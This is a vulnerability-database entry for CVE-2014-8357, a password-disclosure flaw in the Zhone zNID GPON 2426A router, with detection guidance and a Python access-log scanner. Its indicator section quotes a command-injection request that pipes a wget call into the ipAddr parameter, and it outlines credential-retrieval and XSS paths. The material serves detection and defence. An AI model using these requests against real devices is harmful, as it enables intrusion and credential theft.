CVE-2014-8357
Published: 2017-10-17
Priority: P2 · 73 · high
CVSS 3.0: 8.8 (High), CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
In-the-wild exploit: VulnCheck KEV, exploited in the wild
EPSS: 5.44% (91.7th percentile)
backupsettings.html in the web administrative portal in Zhone zNID GPON 2426A before S3.0.501 places a session key in a URL, which allows remote attackers to obtain arbitrary user passwords via the sessionKey parameter in a getConfig action to backupsettings.conf.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dasanzhone | znid_2426a_firmware | < s3.0.501 | s3.0.501 |
Detection & IOCs (extracted from sources)
`command/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3`
- Detect GET requests to /backupsettings.conf with 'action=getConfig' and a 'sessionKey' parameter — this is the core exploit path for CVE-2014-8357 password disclosure.
- Monitor for the sessionKey parameter appearing in HTTP request URLs (not just POST bodies), indicating session token leakage via Referer or logs.
- Detect command injection attempts via the 'ipAddr' parameter in requests to /zhnping.cmd, particularly pipe characters followed by OS commands (e.g., '|wget').
- Alert on POST requests to /uploadsettings.cgi with multipart/form-data containing a file named 'backupsettings.conf', which can be used to overwrite admin credentials.
- Detect access to /menuBcm.js followed by manipulation of its response (e.g., via proxy interception replacing 'admin' with a low-privilege username) as an indicator of privilege escalation (CVE-2014-8356).
- Detect stored XSS payloads in GET requests to /zhnsystemconfig.cgi via the snmpSysName, snmpSysLocation, or snmpSysContact parameters (e.g., presence of '<script>' tags).
- Passwords in the backup configuration file are Base64-encoded, not encrypted — any attacker retrieving backupsettings.conf can trivially decode all credentials.
- Access control on the Zhone web portal is enforced client-side via JavaScript only; server-side authorization is absent, meaning any authenticated low-privilege user can reach admin functions by manipulating JS responses.
- The vulnerability affects Zhone zNID GPON 2426A firmware before S3.0.501; the exploit-db advisory recommends upgrading to S3.1.241 for full remediation of all reported issues.
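The request-level detection items above, turned into a small access-log scanner as an added example (not code from the advisory or any of the sources). The log lines are constructed samples in combined log format with RFC 5737 addresses; note that an access log shows only the request line, so the /uploadsettings.cgi item can only be flagged for body inspection elsewhere.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the advisory or any source);
# request shapes follow the detection items above, with RFC 5737 addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Oct/2017:10:00:01 +0000] "GET /backupsettings.conf?action=getConfig&sessionKey=985703201 HTTP/1.1" 200 4123
192.0.2.10 - - [17/Oct/2017:10:00:02 +0000] "GET /command/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1%7Cwget%20http://192.0.2.17/x&ttl=30 HTTP/1.1" 200 88
192.0.2.11 - - [17/Oct/2017:10:00:03 +0000] "POST /uploadsettings.cgi HTTP/1.1" 200 12
192.0.2.12 - - [17/Oct/2017:10:00:04 +0000] "GET /zhnsystemconfig.cgi?snmpSysName=%3Cscript%3E HTTP/1.1" 200 301
192.0.2.13 - - [17/Oct/2017:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# Common/combined log format: source address, method, request target, status code.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(method, target):
    """Return detection labels for one request, following the items above.
    parse_qs percent-decodes values, so an encoded pipe (%7C) is seen as '|'."""
    parts = urlsplit(target)
    path, params = parts.path, parse_qs(parts.query)
    hits = []
    # Core CVE-2014-8357 path: getConfig on backupsettings.conf with a sessionKey in the URL.
    if path.endswith("/backupsettings.conf") and params.get("action") == ["getConfig"] and "sessionKey" in params:
        hits.append("cve-2014-8357-getconfig")
    # Session token carried in the URL at all (leaks via Referer and logs).
    if "sessionKey" in params:
        hits.append("sessionkey-in-url")
    # Pipe in the ipAddr parameter of zhnping.cmd (command injection indicator).
    if path.endswith("/zhnping.cmd") and any("|" in v for v in params.get("ipAddr", [])):
        hits.append("zhnping-ipaddr-injection")
    # Settings upload: the body (file named backupsettings.conf) is not in the access log,
    # so flag the POST for follow-up in a proxy or full-packet capture.
    if method == "POST" and path.endswith("/uploadsettings.cgi"):
        hits.append("uploadsettings-post")
    # Stored XSS via the SNMP system fields of zhnsystemconfig.cgi.
    for key in ("snmpSysName", "snmpSysLocation", "snmpSysContact"):
        if path.endswith("/zhnsystemconfig.cgi") and any("<script" in v.lower() for v in params.get(key, [])):
            hits.append(f"xss-{key}")
    return hits

def scan_log(text):
    """Return (source, target, labels) for each log line that matches any detection item."""
    flagged = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m["method"], m["target"])
        if hits:
            flagged.append((m["src"], m["target"], hits))
    return flagged

if __name__ == "__main__":
    for src, target, hits in scan_log(SAMPLE_LOG):
        print(f"{src} {target[:60]} -> {', '.join(hits)}")
```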
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 4.0 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:N/A:N |
| vulncheck | | 8.8 | HIGH | |
GHSA
GHSA-33rm-chj2-wr75 [HIGH]: backupsettings (ghsa_unreviewed, 2022-05-14)
VulnCheck
CVE-2014-8357 [HIGH]: Zhone zNID GPON 2426A backupsettings.html Vulnerability (vulncheck, 2014, CVSS 8.8)
Affected: dasanzhone znid_2426a_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.netlab.360.com/men-sheng-fa-da-cai-fodchajiang-shi-wang-luo/
No detection rules found.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/133921/Zhone-Insecure-Reference-Password-Disclosure-Command-Injection.html
- http://seclists.org/fulldisclosure/2015/Oct/57
- http://www.securityfocus.com/archive/1/536663/100/0/threaded
- https://www.exploit-db.com/exploits/38453/